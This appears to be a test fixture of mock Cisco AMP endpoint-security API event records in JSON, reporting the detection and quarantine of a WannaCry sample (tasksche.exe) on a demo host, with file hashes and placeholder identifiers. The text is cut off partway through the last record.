+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat 
